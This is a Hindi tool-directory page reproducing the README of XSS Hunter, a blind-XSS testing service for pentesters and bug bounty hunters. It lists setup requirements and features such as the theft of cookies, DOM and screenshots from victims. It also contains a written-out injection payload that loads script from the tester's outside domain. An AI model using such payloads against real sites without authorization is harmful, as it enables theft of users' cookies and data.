Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
xsshunter — XSS Hunter सेवा - XSSHunter.com का एक पोर्टेबल संस्करण | Kitploit
उपकरण/GitHubGitHub/mandatoryprogrammer/xsshunter
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmandatoryprogrammer/xsshunter

xsshunter

XSS Hunter सेवा - XSSHunter.com का एक पोर्टेबल संस्करण

रिपॉजिटरी देखें
1.6k3035 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पदावनत - नया एक्सप्रेस संस्करण आज़माएँ

अधिक जानकारी के लिए यहाँ देखें: https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter स्रोत कोड

यह https://xsshunter.com पर चलने वाले स्रोत कोड का एक पोर्टेबल संस्करण है। इसे सुरक्षा पेशेवरों और बग बाउंटी हंटर्स के लिए किसी भी सर्वर पर आसानी से स्थापित करने के लिए डिज़ाइन किया गया है जो XSS का अधिक शक्तिशाली तरीके से परीक्षण करना चाहते हैं।

यदि आप इस सॉफ़्टवेयर को सेट अप नहीं करना चाहते हैं और बस परीक्षण शुरू करना चाहते हैं, तो https://xsshunter.com देखें।

आवश्यकताएँ

  • एक सर्वर (अधिमानतः) Ubuntu चलाने वाला।
  • XSS पेलोड फायर ईमेल भेजने के लिए एक Mailgun खाता।
  • एक डोमेन नाम, अधिमानतः कुछ छोटा ताकि पेलोड का आकार छोटा रहे। यहाँ दो अक्षरों वाले डोमेन नाम खोजने के लिए एक अच्छी वेबसाइट है: https://catechgory.com/। उदाहरण के लिए मेरा डोमेन xss.ht है।
  • एक वाइल्डकार्ड SSL प्रमाणपत्र, यहाँ एक सस्ता है। यह आवश्यक है क्योंकि XSS Hunter उपयोगकर्ताओं को उनके सबडोमेन के आधार पर पहचानता है और उन सभी को SSL सक्षम होना चाहिए। हम Let's Encrypt का उपयोग नहीं कर सकते क्योंकि वे वाइल्डकार्ड प्रमाणपत्रों का समर्थन नहीं करते। मैं CA के व्यवसाय मॉडल का अपमान करने से बचूंगा, लेकिन निश्चिंत रहें कि यह बहुत मूर्खतापूर्ण है और आपको वाइल्डकार्ड प्रमाणपत्र जारी करने में उन्हें बहुत कम खर्च आता है, इसलिए सबसे सस्ता प्रदाता चुनें जो आपको मिले (जब तक कि वह सभी ब्राउज़रों में समर्थित हो)।

सेटअप

कृपया अपने स्वयं के सर्वर पर XSS Hunter सेट अप करने की जानकारी के लिए https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ देखें।

कार्यक्षमता का सारांश

साइन अप करने पर आप एक विशेष छोटा डोमेन जैसे yoursubdomain.xss.ht बनाएंगे जो आपकी XSS कमजोरियों को पहचानता है और आपके पेलोड को होस्ट करता है। फिर आप इस सबडोमेन का उपयोग अपने XSS परीक्षण में करते हैं, इंजेक्शन प्रयासों जैसे "><script src=//yoursubdomain.xss.ht></script> का उपयोग करके। XSS Hunter स्वचालित रूप से XSS प्रोब्स प्रस्तुत करेगा और जब वे फायर होते हैं तो परिणामी जानकारी एकत्र करेगा।

विशेषताएँ

  • प्रबंधित XSS पेलोड फायर: अपने XSS Hunter खाते के नियंत्रण कक्ष में अपने सभी XSS पेलोड प्रबंधित करें।
  • शक्तिशाली XSS प्रोब्स: जब भी कोई प्रोब किसी कमजोर पृष्ठ पर फायर होता है, तो निम्नलिखित जानकारी एकत्र की जाती है:
    • कमजोर पृष्ठ का URI
    • निष्पादन का मूल
    • पीड़ित का IP पता
    • पृष्ठ रेफ़रर
    • पीड़ित का उपयोगकर्ता एजेंट
    • सभी नॉन-HTTP-Only कुकीज़
    • पृष्ठ का पूर्ण HTML DOM
    • प्रभावित पृष्ठ का पूर्ण स्क्रीनशॉट
    • जिम्मेदार HTTP अनुरोध (यदि XSS Hunter संगत उपकरण का उपयोग किया गया हो)
  • पूर्ण पृष्ठ स्क्रीनशॉट: XSS Hunter प्रोब्स HTML5 कैनवास API का उपयोग करके कमजोर पृष्ठ का पूर्ण स्क्रीनशॉट उत्पन्न करते हैं जहाँ XSS पेलोड फायर हुआ है। इस सुविधा से आप आंतरिक प्रशासनिक पैनल, सहायता डेस्क, लॉगिंग सिस्टम और अन्य आंतरिक वेब ऐप्स में झाँक सकते हैं। यह अधिक शक्तिशाली रिपोर्ट तैयार करने की अनुमति देता है जो आपके ग्राहक या बग बाउंटी प्रोग्राम को कमजोरी का पूरा प्रभाव दिखाती हैं।
  • मार्कअप रिपोर्ट जनरेशन: प्रत्येक XSS पेलोड रिपोर्ट के साथ एक पूर्व-निर्मित मार्कडाउन रिपोर्ट आती है। ये जनरेट की गई रिपोर्ट अन्य मार्कडाउन-समर्थन करने वाले प्लेटफॉर्म जैसे Phabricator के साथ भी संगत हैं, जो कंपनी टिकटिंग सिस्टम पर आसान बग रिपोर्टिंग की सुविधा प्रदान करती हैं।
  • XSS पेलोड फायर ईमेल रिपोर्ट: XSS पेलोड फायर विस्तृत ईमेल रिपोर्ट भी भेजते हैं जिन्हें महत्वपूर्ण बगों की आसान रिपोर्टिंग के लिए उपयुक्त सुरक्षा संपर्कों को आसानी से अग्रेषित किया जा सकता है।
  • स्वचालित पेलोड जनरेशन: XSS Hunter आपके वेब एप्लिकेशन सुरक्षा परीक्षण में उपयोग के लिए स्वचालित रूप से XSS पेलोड उत्पन्न करता है।
  • सहसंबद्ध इंजेक्शन: शायद XSS Hunter की सबसे शक्तिशाली विशेषता इंजेक्शन प्रयासों को XSS पेलोड फायर के साथ सहसंबद्ध करने की क्षमता है। XSS Hunter संगत परीक्षण उपकरण का उपयोग करके आप तुरंत जान सकते हैं कि किसी विशिष्ट पेलोड के फायर होने का कारण क्या था (इंजेक्शन प्रयास के हफ्तों बाद भी!)।
  • पेलोड ईमेल के लिए वैकल्पिक PGP एन्क्रिप्शन: अतिरिक्त पैरानॉयड? क्लाइंट-साइड PGP एन्क्रिप्शन उपलब्ध है जो XSS Hunter सेवा को भेजने से पहले पीड़ित के ब्राउज़र में सभी इंजेक्शन डेटा को एन्क्रिप्ट करेगा।
  • पृष्ठ ग्रैबिंग: आपके XSS पेलोड फायर होने पर आप पेलोड द्वारा स्वचालित रूप से पुनर्प्राप्त और संग्रहीत करने के लिए सापेक्ष पथों की एक सूची निर्दिष्ट कर सकते हैं। यह आंतरिक सिस्टम पर crossdomain.xml जैसी खराब नीतियों जैसी अन्य कमजोरियों को खोजने में उपयोगी है जो सामान्यतः एक्सेस नहीं किए जा सकते।
  • द्वितीयक पेलोड लोडिंग: क्या आपके पास एक द्वितीयक पेलोड है जिसे आप XSS Hunter द्वारा अपना कार्य पूरा करने के बाद लोड करना चाहते हैं? XSS Hunter आपको अपना संग्रह पूरा करने के बाद चलाने के लिए एक द्वितीयक JavaScript पेलोड निर्दिष्ट करने का विकल्प प्रदान करता है।
  • iOS वेब एप्लिकेशन: अपने XSS पेलोड फायर को iOS वेब ऐप के माध्यम से देखना भी संभव है। बस /app पथ पर जाएँ और पृष्ठ को अपने iPhone के डेस्कटॉप पर एक वेब एप्लिकेशन के रूप में सहेजें।

उल्लेखनीय शोषण

  • Tesla के आंतरिक सेवा उपकरण में ब्लाइंड XSS: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • Spotify के Salesforce एकीकरण में ब्लाइंड XSS: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • GoDaddy के सहायता पैनल में ब्लाइंड XSS: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

योगदान देना चाहते हैं?

सभी कोड मेरे द्वारा बनाया गया था और (इस कारण से) संभवतः सर्वोत्तम अभ्यास नहीं है और निश्चित रूप से अनुकूलन/सफाई की आवश्यकता है। किसी भी पुल अनुरोध की सराहना की जाती है!

टूल डाउनलोड करें